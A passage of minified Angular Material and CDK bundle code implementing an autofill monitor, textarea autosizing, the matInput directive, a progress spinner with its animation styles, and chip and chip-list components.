J,c="cdk-text-field-autofilled",d=T=>{"cdk-text-field-autofill-start"!==T.animationName||i.classList.contains(c)?"cdk-text-field-autofill-end"===T.animationName&&i.classList.contains(c)&&(i.classList.remove(c),this._ngZone.run(()=>r.next({target:T.target,isAutofilled:!1}))):(i.classList.add(c),this._ngZone.run(()=>r.next({target:T.target,isAutofilled:!0})))};return this._ngZone.runOutsideAngular(()=>{i.addEventListener("animationstart",d,kF),i.classList.add("cdk-text-field-autofill-monitored")}),this._monitoredElements.set(i,{subject:r,unlisten:()=>{i.removeEventListener("animationstart",d,kF)}}),r}stopMonitoring(e){const i=Gr(e),n=this._monitoredElements.get(i);n&&(n.unlisten(),n.subject.complete(),i.classList.remove("cdk-text-field-autofill-monitored"),i.classList.remove("cdk-text-field-autofilled"),this._monitoredElements.delete(i))}ngOnDestroy(){this._monitoredElements.forEach((e,i)=>this.stopMonitoring(i))}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Go=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._platform=i,this._ngZone=n,this._destroyed=new J,this._enabled=!0,this._previousMinRows=-1,this._isViewInited=!1,this._handleFocusEvent=c=>{this._hasFocus="focus"===c.type},this._document=r,this._textareaElement=this._elementRef.nativeElement}get minRows(){return this._minRows}set minRows(e){this._minRows=Uo(e),this._setMinHeight()}get maxRows(){return this._maxRows}set maxRows(e){this._maxRows=Uo(e),this._setMaxHeight()}get enabled(){return this._enabled}set enabled(e){e=wi(e),this._enabled!==e&&((this._enabled=e)?this.resizeToFitContent(!0):this.reset())}get placeholder(){return this._textareaElement.placeholder}set placeholder(e){this._cachedPlaceholderHeight=void 0,e?this._textareaElement.setAttribute("placeholder",e):this._textareaElement.removeAttribute("placeholder"),this._cacheTextareaPlaceholderHeight()}_setMinHeight(){const e=this.minRows&&this._cachedLineHeight?this.minRows*this._cachedLineHeight+"px":null;e&&(this._textareaElement.style.minHeight=e)}_setMaxHeight(){const e=this.maxRows&&this._cachedLineHeight?this.maxRows*this._cachedLineHeight+"px":null;e&&(this._textareaElement.style.maxHeight=e)}ngAfterViewInit(){this._platform.isBrowser&&(this._initialHeight=this._textareaElement.style.height,this.resizeToFitContent(),this._ngZone.runOutsideAngular(()=>{Tc(this._getWindow(),"resize").pipe(mw(16),ea(this._destroyed)).subscribe(()=>this.resizeToFitContent(!0)),this._textareaElement.addEventListener("focus",this._handleFocusEvent),this._textareaElement.addEventListener("blur",this._handleFocusEvent)}),this._isViewInited=!0,this.resizeToFitContent(!0))}ngOnDestroy(){this._textareaElement.removeEventListener("focus",this._handleFocusEvent),this._textareaElement.removeEventListener("blur",this._handleFocusEvent),this._destroyed.next(),this._destroyed.complete()}_cacheTextareaLineHeight(){if(this._cachedLineHeight)return;let e=this._textareaElement.cloneNode(!1);e.rows=1,e.style.position="absolute",e.style.visibility="hidden",e.style.border="none",e.style.padding="0",e.style.height="",e.style.minHeight="",e.style.maxHeight="",e.style.overflow="hidden",this._textareaElement.parentNode.appendChild(e),this._cachedLineHeight=e.clientHeight,e.remove(),this._setMinHeight(),this._setMaxHeight()}_measureScrollHeight(){const e=this._textareaElement,i=e.style.marginBottom||"",n=this._platform.FIREFOX,r=n&&this._hasFocus,c=n?"cdk-textarea-autosize-measuring-firefox":"cdk-textarea-autosize-measuring";r&&(e.style.marginBottom=`${e.clientHeight}px`),e.classList.add(c);const d=e.scrollHeight-4;return e.classList.remove(c),r&&(e.style.marginBottom=i),d}_cacheTextareaPlaceholderHeight(){if(!this._isViewInited||null!=this._cachedPlaceholderHeight)return;if(!this.placeholder)return void(this._cachedPlaceholderHeight=0);const e=this._textareaElement.value;this._textareaElement.value=this._textareaElement.placeholder,this._cachedPlaceholderHeight=this._measureScrollHeight(),this._textareaElement.value=e}ngDoCheck(){this._platform.isBrowser&&this.resizeToFitContent()}resizeToFitContent(e=!1){if(!this._enabled||(this._cacheTextareaLineHeight(),this._cacheTextareaPlaceholderHeight(),!this._cachedLineHeight))return;const i=this._elementRef.nativeElement,n=i.value;if(!e&&this._minRows===this._previousMinRows&&n===this._previousValue)return;const r=this._measureScrollHeight(),c=Math.max(r,this._cachedPlaceholderHeight||0);i.style.height=`${c}px`,this._ngZone.runOutsideAngular(()=>{"undefined"!=typeof requestAnimationFrame?requestAnimationFrame(()=>this._scrollToCaretPosition(i)):setTimeout(()=>this._scrollToCaretPosition(i))}),this._previousValue=n,this._previousMinRows=this._minRows}reset(){void 0!==this._initialHeight&&(this._textareaElement.style.height=this._initialHeight)}_noopInputHandler(){}_getDocument(){return this._document||document}_getWindow(){return this._getDocument().defaultView||window}_scrollToCaretPosition(e){const{selectionStart:i,selectionEnd:n}=e;!this._destroyed.isStopped&&this._hasFocus&&e.setSelectionRange(i,n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(cr),Ee(qi),Ee(ga,8))},t.\u0275dir=Ot({type:t,selectors:[["textarea","cdkTextareaAutosize",""]],hostAttrs:["rows","1",1,"cdk-textarea-autosize"],hostBindings:function(e,i){1&e&&he("input",function(){return i._noopInputHandler()})},inputs:{minRows:["cdkAutosizeMinRows","minRows"],maxRows:["cdkAutosizeMaxRows","maxRows"],enabled:["cdkTextareaAutosize","enabled"],placeholder:"placeholder"},exportAs:["cdkTextareaAutosize"]}),t})(),PF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const c8=new ni("MAT_INPUT_VALUE_ACCESSOR"),x0e=["button","checkbox","file","hidden","image","radio","range","reset","submit"];let w0e=0;const I0e=Uw(class{constructor(t,a,e,i){this._defaultErrorStateMatcher=t,this._parentForm=a,this._parentFormGroup=e,this.ngControl=i,this.stateChanges=new J}});let Xa=(()=>{class t extends I0e{constructor(e,i,n,r,c,d,T,k,q,Y){super(d,r,c,n),this._elementRef=e,this._platform=i,this._autofillMonitor=k,this._formField=Y,this._uid="mat-input-"+w0e++,this.focused=!1,this.stateChanges=new J,this.controlType="mat-input",this.autofilled=!1,this._disabled=!1,this._type="text",this._readonly=!1,this._neverEmptyInputTypes=["date","datetime","datetime-local","month","time","week"].filter(Re=>bz().has(Re)),this._iOSKeyupListener=Re=>{const Fe=Re.target;!Fe.value&&0===Fe.selectionStart&&0===Fe.selectionEnd&&(Fe.setSelectionRange(1,1),Fe.setSelectionRange(0,0))};const te=this._elementRef.nativeElement,pe=te.nodeName.toLowerCase();this._inputValueAccessor=T||te,this._previousNativeValue=this.value,this.id=this.id,i.IOS&&q.runOutsideAngular(()=>{e.nativeElement.addEventListener("keyup",this._iOSKeyupListener)}),this._isServer=!this._platform.isBrowser,this._isNativeSelect="select"===pe,this._isTextarea="textarea"===pe,this._isInFormField=!!Y,this._isNativeSelect&&(this.controlType=te.multiple?"mat-native-select-multiple":"mat-native-select")}get disabled(){return this.ngControl&&null!==this.ngControl.disabled?this.ngControl.disabled:this._disabled}set disabled(e){this._disabled=wi(e),this.focused&&(this.focused=!1,this.stateChanges.next())}get id(){return this._id}set id(e){this._id=e||this._uid}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Td.required))&&void 0!==r&&r}set required(e){this._required=wi(e)}get type(){return this._type}set type(e){this._type=e||"text",this._validateType(),!this._isTextarea&&bz().has(this._type)&&(this._elementRef.nativeElement.type=this._type)}get value(){return this._inputValueAccessor.value}set value(e){e!==this.value&&(this._inputValueAccessor.value=e,this.stateChanges.next())}get readonly(){return this._readonly}set readonly(e){this._readonly=wi(e)}ngAfterViewInit(){this._platform.isBrowser&&this._autofillMonitor.monitor(this._elementRef.nativeElement).subscribe(e=>{this.autofilled=e.isAutofilled,this.stateChanges.next()})}ngOnChanges(){this.stateChanges.next()}ngOnDestroy(){this.stateChanges.complete(),this._platform.isBrowser&&this._autofillMonitor.stopMonitoring(this._elementRef.nativeElement),this._platform.IOS&&this._elementRef.nativeElement.removeEventListener("keyup",this._iOSKeyupListener)}ngDoCheck(){this.ngControl&&this.updateErrorState(),this._dirtyCheckNativeValue(),this._dirtyCheckPlaceholder()}focus(e){this._elementRef.nativeElement.focus(e)}_focusChanged(e){e!==this.focused&&(this.focused=e,this.stateChanges.next())}_onInput(){}_dirtyCheckPlaceholder(){var e;const i=this._formField,n=!i||"legacy"!==i.appearance||null!==(e=i._hasLabel)&&void 0!==e&&e.call(i)?this.placeholder:null;if(n!==this._previousPlaceholder){const r=this._elementRef.nativeElement;this._previousPlaceholder=n,n?r.setAttribute("placeholder",n):r.removeAttribute("placeholder")}}_dirtyCheckNativeValue(){const e=this._elementRef.nativeElement.value;this._previousNativeValue!==e&&(this._previousNativeValue=e,this.stateChanges.next())}_validateType(){x0e.indexOf(this._type)}_isNeverEmpty(){return this._neverEmptyInputTypes.indexOf(this._type)>-1}_isBadInput(){let e=this._elementRef.nativeElement.validity;return e&&e.badInput}get empty(){return!(this._isNeverEmpty()||this._elementRef.nativeElement.value||this._isBadInput()||this.autofilled)}get shouldLabelFloat(){if(this._isNativeSelect){const e=this._elementRef.nativeElement,i=e.options[0];return this.focused||e.multiple||!this.empty||!!(e.selectedIndex>-1&&i&&i.label)}return this.focused||!this.empty}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}onContainerClick(){this.focused||this.focus()}_isInlineSelect(){const e=this._elementRef.nativeElement;return this._isNativeSelect&&(e.multiple||e.size>1)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(cr),Ee(fm,10),Ee(y1,8),Ee(lg,8),Ee(mp),Ee(c8,10),Ee(D0e),Ee(qi),Ee(cb,8))},t.\u0275dir=Ot({type:t,selectors:[["input","matInput",""],["textarea","matInput",""],["select","matNativeControl",""],["input","matNativeControl",""],["textarea","matNativeControl",""]],hostAttrs:[1,"mat-input-element","mat-form-field-autofill-control"],hostVars:12,hostBindings:function(e,i){1&e&&he("focus",function(){return i._focusChanged(!0)})("blur",function(){return i._focusChanged(!1)})("input",function(){return i._onInput()}),2&e&&(Gs("disabled",i.disabled)("required",i.required),Rt("id",i.id)("data-placeholder",i.placeholder)("name",i.name||null)("readonly",i.readonly&&!i._isNativeSelect||null)("aria-invalid",i.empty&&i.required?null:i.errorState)("aria-required",i.required),Ct("mat-input-server",i._isServer)("mat-native-select-inline",i._isInlineSelect()))},inputs:{disabled:"disabled",id:"id",placeholder:"placeholder",name:"name",required:"required",type:"type",errorStateMatcher:"errorStateMatcher",userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],value:"value",readonly:"readonly"},exportAs:["matInput"],features:[ki([{provide:sb,useExisting:t}]),ci,sa]}),t})(),l8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mp],imports:[PF,r8,la,PF,r8]}),t})();function R0e(t,a){if(1&t&&(fi(),it(0,"circle",4)),2&t){const e=V(),i=Ti(1);ri("animation-name","mat-progress-spinner-stroke-rotate-"+e._spinnerAnimationLabel)("stroke-dashoffset",e._getStrokeDashOffset(),"px")("stroke-dasharray",e._getStrokeCircumference(),"px")("stroke-width",e._getCircleStrokeWidth(),"%")("transform-origin",e._getCircleTransformOrigin(i)),Rt("r",e._getCircleRadius())}}function S0e(t,a){if(1&t&&(fi(),it(0,"circle",4)),2&t){const e=V(),i=Ti(1);ri("stroke-dashoffset",e._getStrokeDashOffset(),"px")("stroke-dasharray",e._getStrokeCircumference(),"px")("stroke-width",e._getCircleStrokeWidth(),"%")("transform-origin",e._getCircleTransformOrigin(i)),Rt("r",e._getCircleRadius())}}const P0e=Pd(class{constructor(t){this._elementRef=t}},"primary"),O0e=new ni("mat-progress-spinner-default-options",{providedIn:"root",factory:function N0e(){return{diameter:100}}});class xl extends P0e{constructor(a,e,i,n,r,c,d,T){super(a),this._document=i,this._diameter=100,this._value=0,this._resizeSubscription=I.EMPTY,this.mode="determinate";const k=xl._diameters;this._spinnerAnimationLabel=this._getSpinnerAnimationLabel(),k.has(i.head)||k.set(i.head,new Set([100])),this._noopAnimations="NoopAnimations"===n&&!!r&&!r._forceAnimations,"mat-spinner"===a.nativeElement.nodeName.toLowerCase()&&(this.mode="indeterminate"),r&&(r.color&&(this.color=this.defaultColor=r.color),r.diameter&&(this.diameter=r.diameter),r.strokeWidth&&(this.strokeWidth=r.strokeWidth)),e.isBrowser&&e.SAFARI&&d&&c&&T&&(this._resizeSubscription=d.change(150).subscribe(()=>{"indeterminate"===this.mode&&T.run(()=>c.markForCheck())}))}get diameter(){return this._diameter}set diameter(a){this._diameter=Uo(a),this._spinnerAnimationLabel=this._getSpinnerAnimationLabel(),this._styleRoot&&this._attachStyleNode()}get strokeWidth(){return this._strokeWidth||this.diameter/10}set strokeWidth(a){this._strokeWidth=Uo(a)}get value(){return"determinate"===this.mode?this._value:0}set value(a){this._value=Math.max(0,Math.min(100,Uo(a)))}ngOnInit(){const a=this._elementRef.nativeElement;this._styleRoot=_3(a)||this._document.head,this._attachStyleNode(),a.classList.add("mat-progress-spinner-indeterminate-animation")}ngOnDestroy(){this._resizeSubscription.unsubscribe()}_getCircleRadius(){return(this.diameter-10)/2}_getViewBox(){const a=2*this._getCircleRadius()+this.strokeWidth;return`0 0 ${a} ${a}`}_getStrokeCircumference(){return 2*Math.PI*this._getCircleRadius()}_getStrokeDashOffset(){return"determinate"===this.mode?this._getStrokeCircumference()*(100-this._value)/100:null}_getCircleStrokeWidth(){return this.strokeWidth/this.diameter*100}_getCircleTransformOrigin(a){var e;const i=50*(null!==(e=a.currentScale)&&void 0!==e?e:1);return`${i}% ${i}%`}_attachStyleNode(){const a=this._styleRoot,e=this._diameter,i=xl._diameters;let n=i.get(a);if(!n||!n.has(e)){const r=this._document.createElement("style");r.setAttribute("mat-spinner-animation",this._spinnerAnimationLabel),r.textContent=this._getAnimationText(),a.appendChild(r),n||(n=new Set,i.set(a,n)),n.add(e)}}_getAnimationText(){const a=this._getStrokeCircumference();return"\n @keyframes mat-progress-spinner-stroke-rotate-DIAMETER {\n 0% { stroke-dashoffset: START_VALUE; transform: rotate(0); }\n 12.5% { stroke-dashoffset: END_VALUE; transform: rotate(0); }\n 12.5001% { stroke-dashoffset: END_VALUE; transform: rotateX(180deg) rotate(72.5deg); }\n 25% { stroke-dashoffset: START_VALUE; transform: rotateX(180deg) rotate(72.5deg); }\n\n 25.0001% { stroke-dashoffset: START_VALUE; transform: rotate(270deg); }\n 37.5% { stroke-dashoffset: END_VALUE; transform: rotate(270deg); }\n 37.5001% { stroke-dashoffset: END_VALUE; transform: rotateX(180deg) rotate(161.5deg); }\n 50% { stroke-dashoffset: START_VALUE; transform: rotateX(180deg) rotate(161.5deg); }\n\n 50.0001% { stroke-dashoffset: START_VALUE; transform: rotate(180deg); }\n 62.5% { stroke-dashoffset: END_VALUE; transform: rotate(180deg); }\n 62.5001% { stroke-dashoffset: END_VALUE; transform: rotateX(180deg) rotate(251.5deg); }\n 75% { stroke-dashoffset: START_VALUE; transform: rotateX(180deg) rotate(251.5deg); }\n\n 75.0001% { stroke-dashoffset: START_VALUE; transform: rotate(90deg); }\n 87.5% { stroke-dashoffset: END_VALUE; transform: rotate(90deg); }\n 87.5001% { stroke-dashoffset: END_VALUE; transform: rotateX(180deg) rotate(341.5deg); }\n 100% { stroke-dashoffset: START_VALUE; transform: rotateX(180deg) rotate(341.5deg); }\n }\n".replace(/START_VALUE/g,""+.95*a).replace(/END_VALUE/g,""+.2*a).replace(/DIAMETER/g,`${this._spinnerAnimationLabel}`)}_getSpinnerAnimationLabel(){return this.diameter.toString().replace(".","_")}}xl._diameters=new WeakMap,xl.\u0275fac=function(a){return new(a||xl)(Ee(mi),Ee(cr),Ee(ga,8),Ee(ar,8),Ee(O0e),Ee(Ma),Ee(bm),Ee(qi))},xl.\u0275cmp=Wt({type:xl,selectors:[["mat-progress-spinner"],["mat-spinner"]],hostAttrs:["role","progressbar","tabindex","-1",1,"mat-progress-spinner","mat-spinner"],hostVars:10,hostBindings:function(a,e){2&a&&(Rt("aria-valuemin","determinate"===e.mode?0:null)("aria-valuemax","determinate"===e.mode?100:null)("aria-valuenow","determinate"===e.mode?e.value:null)("mode",e.mode),ri("width",e.diameter,"px")("height",e.diameter,"px"),Ct("_mat-animation-noopable",e._noopAnimations))},inputs:{color:"color",diameter:"diameter",strokeWidth:"strokeWidth",mode:"mode",value:"value"},exportAs:["matProgressSpinner"],features:[ci],decls:4,vars:8,consts:[["preserveAspectRatio","xMidYMid meet","focusable","false","aria-hidden","true",3,"ngSwitch"],["svg",""],["cx","50%","cy","50%",3,"animation-name","stroke-dashoffset","stroke-dasharray","stroke-width","transform-origin",4,"ngSwitchCase"],["cx","50%","cy","50%",3,"stroke-dashoffset","stroke-dasharray","stroke-width","transform-origin",4,"ngSwitchCase"],["cx","50%","cy","50%"]],template:function(a,e){1&a&&(fi(),m(0,"svg",0,1),ne(2,R0e,1,11,"circle",2),ne(3,S0e,1,9,"circle",3),u()),2&a&&(ri("width",e.diameter,"px")("height",e.diameter,"px"),F("ngSwitch","indeterminate"===e.mode),Rt("viewBox",e._getViewBox()),g(2),F("ngSwitchCase",!0),g(1),F("ngSwitchCase",!1))},dependencies:[Jf,p1],styles:[".mat-progress-spinner{display:block;position:relative;overflow:hidden}.mat-progress-spinner svg{position:absolute;transform:rotate(-90deg);top:0;left:0;transform-origin:center;overflow:visible}.mat-progress-spinner circle{fill:rgba(0,0,0,0);transition:stroke-dashoffset 225ms linear}.cdk-high-contrast-active .mat-progress-spinner circle{stroke:CanvasText}.mat-progress-spinner[mode=indeterminate] svg{animation:mat-progress-spinner-linear-rotate 2000ms linear infinite}.mat-progress-spinner[mode=indeterminate] circle{transition-property:stroke;animation-duration:4000ms;animation-timing-function:cubic-bezier(0.35, 0, 0.25, 1);animation-iteration-count:infinite}.mat-progress-spinner._mat-animation-noopable svg,.mat-progress-spinner._mat-animation-noopable circle{animation:none;transition:none}@keyframes mat-progress-spinner-linear-rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}@keyframes mat-progress-spinner-stroke-rotate-100{0%{stroke-dashoffset:268.606171575px;transform:rotate(0)}12.5%{stroke-dashoffset:56.5486677px;transform:rotate(0)}12.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(72.5deg)}25%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(72.5deg)}25.0001%{stroke-dashoffset:268.606171575px;transform:rotate(270deg)}37.5%{stroke-dashoffset:56.5486677px;transform:rotate(270deg)}37.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(161.5deg)}50%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(161.5deg)}50.0001%{stroke-dashoffset:268.606171575px;transform:rotate(180deg)}62.5%{stroke-dashoffset:56.5486677px;transform:rotate(180deg)}62.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(251.5deg)}75%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(251.5deg)}75.0001%{stroke-dashoffset:268.606171575px;transform:rotate(90deg)}87.5%{stroke-dashoffset:56.5486677px;transform:rotate(90deg)}87.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(341.5deg)}100%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(341.5deg)}}"],encapsulation:2,changeDetection:0});let OF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,rn,la]}),t})();const z0e=["*"],NF=new ni("MatChipRemove"),LF=new ni("MatChipAvatar"),zF=new ni("MatChipTrailingIcon");class W0e{constructor(a){this._elementRef=a}}const F0e=dp(Pd(El(W0e),"primary"),-1);let db=(()=>{class t extends F0e{constructor(e,i,n,r,c,d,T,k){super(e),this._ngZone=i,this._changeDetectorRef=c,this._hasFocus=!1,this.chipListSelectable=!0,this._chipListMultiple=!1,this._chipListDisabled=!1,this.role="option",this._selected=!1,this._selectable=!0,this._disabled=!1,this._removable=!0,this._onFocus=new J,this._onBlur=new J,this.selectionChange=new Tt,this.destroyed=new Tt,this.removed=new Tt,this._addHostClassName(),this._chipRippleTarget=d.createElement("div"),this._chipRippleTarget.classList.add("mat-chip-ripple"),this._elementRef.nativeElement.appendChild(this._chipRippleTarget),this._chipRipple=new DW(this,i,this._chipRippleTarget,n),this._chipRipple.setupTriggerEvents(e),this.rippleConfig=r||{},this._animationsDisabled="NoopAnimations"===T,this.tabIndex=null!=k&&parseInt(k)||-1}get rippleDisabled(){return this.disabled||this.disableRipple||this._animationsDisabled||!!this.rippleConfig.disabled}get selected(){return this._selected}set selected(e){const i=wi(e);i!==this._selected&&(this._selected=i,this._dispatchSelectionChange())}get value(){return void 0!==this._value?this._value:this._elementRef.nativeElement.textContent}set value(e){this._value=e}get selectable(){return this._selectable&&this.chipListSelectable}set selectable(e){this._selectable=wi(e)}get disabled(){return this._chipListDisabled||this._disabled}set disabled(e){this._disabled=wi(e)}get removable(){return this._removable}set removable(e){this._removable=wi(e)}get ariaSelected(){return this.selectable&&(this._chipListMultiple||this.selected)?this.selected.toString():null}_addHostClassName(){const e="mat-basic-chip",i=this._elementRef.nativeElement;i.hasAttribute(e)||i.tagName.toLowerCase()===e?i.classList.add(e):i.classList.add("mat-standard-chip")}ngOnDestroy(){this.destroyed.emit({chip:this}),this._chipRipple._removeTriggerEvents()}select(){this._selected||(this._selected=!0,this._dispatchSelectionChange(),this._changeDetectorRef.markForCheck())}deselect(){this._selected&&(this._selected=!1,this._dispatchSelectionChange(),this._changeDetectorRef.markForCheck())}selectViaInteraction(){this._selected||(this._selected=!0,this._dispatchSelectionChange(!0),this._changeDetectorRef.markForCheck())}toggleSelected(e=!1){return this._selected=!this.selected,this._dispatchSelectionChange(e),this._changeDetectorRef.markForCheck(),this.selected}focus(){this._hasFocus||(this._elementRef.nativeElement.focus(),this._onFocus.next({chip:this})),this._hasFocus=!0}remove(){this.removable&&this.removed.emit({chip:this})}_handleClick(e){this.disabled&&e.preventDefault()}_handleKeydown(e){if(!this.disabled)switch(e.keyCode){case 46:case 8:this.remove(),e.preventDefault();break;case 32:this.selectable&&this.toggleSelected(!0),e.preventDefault()}}_blur(){this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this._ngZone.run(()=>{this._hasFocus=!1,this._onBlur.next({chip:this})})})}_dispatchSelectionChange(e=!1){this.selectionChange.emit({source:this,isUserInput:e,selected:this._selected})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(cr),Ee(xW,8),Ee(Ma),Ee(ga),Ee(ar,8),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-basic-chip"],["","mat-basic-chip",""],["mat-chip"],["","mat-chip",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,LF,5),fa(n,zF,5),fa(n,NF,5)),2&e){let r;Vt(r=Bt())&&(i.avatar=r.first),Vt(r=Bt())&&(i.trailingIcon=r.first),Vt(r=Bt())&&(i.removeIcon=r.first)}},hostAttrs:[1,"mat-chip","mat-focus-indicator"],hostVars:15,hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})("keydown",function(r){return i._handleKeydown(r)})("focus",function(){return i.focus()})("blur",function(){return i._blur()}),2&e&&(Rt("tabindex",i.disabled?null:i.tabIndex)("role",i.role)("disabled",i.disabled||null)("aria-disabled",i.disabled.toString())("aria-selected",i.ariaSelected),Ct("mat-chip-selected",i.selected)("mat-chip-with-avatar",i.avatar)("mat-chip-with-trailing-icon",i.trailingIcon||i.removeIcon)("mat-chip-disabled",i.disabled)("_mat-animation-noopable",i._animationsDisabled))},inputs:{color:"color",disableRipple:"disableRipple",tabIndex:"tabIndex",role:"role",selected:"selected",value:"value",selectable:"selectable",disabled:"disabled",removable:"removable"},outputs:{selectionChange:"selectionChange",destroyed:"destroyed",removed:"removed"},exportAs:["matChip"],features:[ci]}),t})(),WF=(()=>{class t{constructor(e,i){this._parentChip=e,"BUTTON"===i.nativeElement.nodeName&&i.nativeElement.setAttribute("type","button")}_handleClick(e){const i=this._parentChip;i.removable&&!i.disabled&&i.remove(),e.stopPropagation(),e.preventDefault()}}return t.\u0275fac=function(e){return new(e||t)(Ee(db),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","matChipRemove",""]],hostAttrs:[1,"mat-chip-remove","mat-chip-trailing-icon"],hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})},features:[ki([{provide:NF,useExisting:t}])]}),t})();const FF=new ni("mat-chips-default-options");let H0e=0,VF=(()=>{class t{constructor(e,i){this._elementRef=e,this._defaultOptions=i,this.focused=!1,this._addOnBlur=!1,this.separatorKeyCodes=this._defaultOptions.separatorKeyCodes,this.chipEnd=new Tt,this.placeholder="",this.id="mat-chip-list-input-"+H0e++,this._disabled=!1,this.inputElement=this._elementRef.nativeElement}set chipList(e){e&&(this._chipList=e,this._chipList.registerInput(this))}get addOnBlur(){return this._addOnBlur}set addOnBlur(e){this._addOnBlur=wi(e)}get disabled(){return this._disabled||this._chipList&&this._chipList.disabled}set disabled(e){this._disabled=wi(e)}get empty(){return!this.inputElement.value}ngOnChanges(){this._chipList.stateChanges.next()}ngOnDestroy(){this.chipEnd.complete()}ngAfterContentInit(){this._focusLastChipOnBackspace=this.empty}_keydown(e){if(e){if(9===e.keyCode&&!es(e,"shiftKey")&&this._chipList._allowFocusEscape(),8===e.keyCode&&this._focusLastChipOnBackspace)return this._chipList._keyManager.setLastItemActive(),void e.preventDefault();this._focusLastChipOnBackspace=!1}this._emitChipEnd(e)}_keyup(e){!this._focusLastChipOnBackspace&&8===e.keyCode&&this.empty&&(this._focusLastChipOnBackspace=!0,e.preventDefault())}_blur(){this.addOnBlur&&this._emitChipEnd(),this.focused=!1,this._chipList.focused||this._chipList._blur(),this._chipList.stateChanges.next()}_focus(){this.focused=!0,this._focusLastChipOnBackspace=this.empty,this._chipList.stateChanges.next()}_emitChipEnd(e){!this.inputElement.value&&!!e&&this._chipList._keydown(e),(!e||this._isSeparatorKey(e))&&(this.chipEnd.emit({input:this.inputElement,value:this.inputElement.value,chipInput:this}),null==e||e.preventDefault())}_onInput(){this._chipList.stateChanges.next()}focus(e){this.inputElement.focus(e)}clear(){this.inputElement.value="",this._focusLastChipOnBackspace=!0}_isSeparatorKey(e){return!es(e)&&new Set(this.separatorKeyCodes).has(e.keyCode)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(FF))},t.\u0275dir=Ot({type:t,selectors:[["input","matChipInputFor",""]],hostAttrs:[1,"mat-chip-input","mat-input-element"],hostVars:5,hostBindings:function(e,i){1&e&&he("keydown",function(r){return i._keydown(r)})("keyup",function(r){return i._keyup(r)})("blur",function(){return i._blur()})("focus",function(){return i._focus()})("input",function(){return i._onInput()}),2&e&&(Gs("id",i.id),Rt("disabled",i.disabled||null)("placeholder",i.placeholder||null)("aria-invalid",i._chipList&&i._chipList.ngControl?i._chipList.ngControl.invalid:null)("aria-required",i._chipList&&i._chipList.required||null))},inputs:{chipList:["matChipInputFor","chipList"],addOnBlur:["matChipInputAddOnBlur","addOnBlur"],separatorKeyCodes:["matChipInputSeparatorKeyCodes","separatorKeyCodes"],placeholder:"placeholder",id:"id",disabled:"disabled"},outputs:{chipEnd:"matChipInputTokenEnd"},exportAs:["matChipInput","matChipInputFor"],features:[sa]}),t})();const U0e=Uw(class{constructor(t,a,e,i){this._defaultErrorStateMatcher=t,this._parentForm=a,this._parentFormGroup=e,this.ngControl=i,this.stateChanges=new J}});let q0e=0;class G0e{constructor(a,e){this.source=a,this.value=e}}let m8=(()=>{class t extends U0e{constructor(e,i,n,r,c,d,T){super(d,r,c,T),this._elementRef=e,this._changeDetectorRef=i,this._dir=n,this.controlType="mat-chip-list",this._lastDestroyedChipIndex=null,this._destroyed=new J,this._uid="mat-chip-list-"+q0e++,this._tabIndex=0,this._userTabIndex=null,this._onTouched=()=>{},this._onChange=()=>{},this._multiple=!1,this._compareWith=(k,q)=>k===q,this._disabled=!1,this.ariaOrientation="horizontal",this._selectable=!0,this.change=new Tt,this.valueChange=new Tt,this.ngControl&&(this.ngControl.valueAccessor=this)}get selected(){var e,i;return this.multiple?(null===(e=this._selectionModel)||void 0===e?void 0:e.selected)||[]:null===(i=this._selectionModel)||void 0===i?void 0:i.selected[0]}get role(){return this._explicitRole?this._explicitRole:this.empty?null:"listbox"}set role(e){this._explicitRole=e}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e),this._syncChipsState()}get compareWith(){return this._compareWith}set compareWith(e){this._compareWith=e,this._selectionModel&&this._initializeSelection()}get value(){return this._value}set value(e){this.writeValue(e),this._value=e}get id(){return this._chipInput?this._chipInput.id:this._uid}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Td.required))&&void 0!==r&&r}set required(e){this._required=wi(e),this.stateChanges.next()}get placeholder(){return this._chipInput?this._chipInput.placeholder:this._placeholder}set placeholder(e){this._placeholder=e,this.stateChanges.next()}get focused(){return this._chipInput&&this._chipInput.focused||this._hasFocusedChip()}get empty(){return(!this._chipInput||this._chipInput.empty)&&(!this.chips||0===this.chips.length)}get shouldLabelFloat(){return!this.empty||this.focused}get disabled(){return this.ngControl?!!this.ngControl.disabled:this._disabled}set disabled(e){this._disabled=wi(e),this._syncChipsState()}get 